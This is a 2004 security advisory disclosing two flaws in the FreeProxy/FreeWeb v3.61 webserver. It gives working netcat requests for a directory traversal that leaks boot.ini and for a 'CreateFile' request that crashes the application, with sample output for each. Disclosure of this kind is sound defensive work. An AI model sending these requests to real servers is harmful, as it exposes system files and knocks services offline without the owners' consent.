SP Research Labs Advisory x08
-----------------------------


FreeProxy/FreeWeb v3.61 Multiple Vulnerabilities
------------------------------------------------

Vendor Home Page:
http://www.alphalink.com.au/~gregr/

Date Released - 1.8.2004 

Downloads.com reported 105,607 downloads.

------------------------------------
Product Description from the vendor: 

FreeProxy is professional Freeware which channels requests for internet pages via a single computer and enables many computers to share an internet connection. If you have dial-up internet access, you can use the Demand Dial or Auto-Dial feature to dial up the internet either when it detects you want to access the internet (demand) or maintain a strict schedule of connection times (auto). Works fast with Cable/Broadband.

--------------------
Directory Traversal:

A directory traversal vulnerability exists within the webserver part of this product, and not the proxy part of it.

Example:
--------

C:\>nc 192.168.1.100 80
GET /../../../../../../../boot.ini%00.html HTTP/1.0

HTTP/1.0 200 OK
Server: FreeProxy/3.61
Date: Fri, 09 Jan 2004 05:09:15 GMT
Content-Type: application/octet-stream
Last-Modified: Tue, 04 Nov 2003 16:55:36 GMT
Content-Length: 194

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional"
/fastdetect

------------------
Denial Of Service:

When making an HTTP request for a function called 'CreateFile', causes the entire application to crash.

Example:
--------
C:\>nc 192.168.1.100 80
GET CreateFile HTTP/1.0

**Application Crashes**

I get the following error message:

Unhandled exception in FreeProxy.exe: 0xC0000005: Access Violation.

-----------------------
Tested on WindowsXP SP1

Original Advisory:
http://www.security-protocols.com/modules.php?name=News&file=article&sid=1691&mode=&order=0&thold=0

Peace out,

------------------------------
badpack3t
www.security-protocols.com
------------------------------